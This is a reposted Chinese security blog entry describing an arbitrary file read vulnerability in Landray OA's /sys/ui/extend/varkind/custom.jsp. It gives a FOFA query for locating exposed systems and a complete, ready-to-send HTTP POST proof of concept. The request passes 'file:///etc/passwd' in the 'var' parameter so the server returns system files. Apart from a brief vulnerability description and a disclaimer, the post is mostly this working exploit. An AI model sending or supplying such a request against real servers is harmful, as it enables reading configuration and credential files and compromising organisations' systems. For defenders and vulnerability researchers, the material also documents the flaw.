蓝凌OA custom.jsp 任意文件读取

本文转载于公众号:融云攻防实验室,原文地址:

蓝凌OA custom.jsp 任意文件读取

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

蓝凌是国内数字化办公专业服务商,阿里钉钉唯一投资的OA厂商,阿里云知识管理与协同领域首家战略合作伙伴。蓝凌OA系统存在任意文件读取漏洞,攻击者通过漏洞可以读取任意配置文件,导致服务器失陷。

图片[1]-蓝凌OA custom.jsp 任意文件读取-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofaapp=”Landray-OA系统”

1.执行POC,读取/etc/passwd,回显内容


POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 42
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}
图片[2]-蓝凌OA custom.jsp 任意文件读取-渗透云记 - 专注于网络安全与技术分享

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容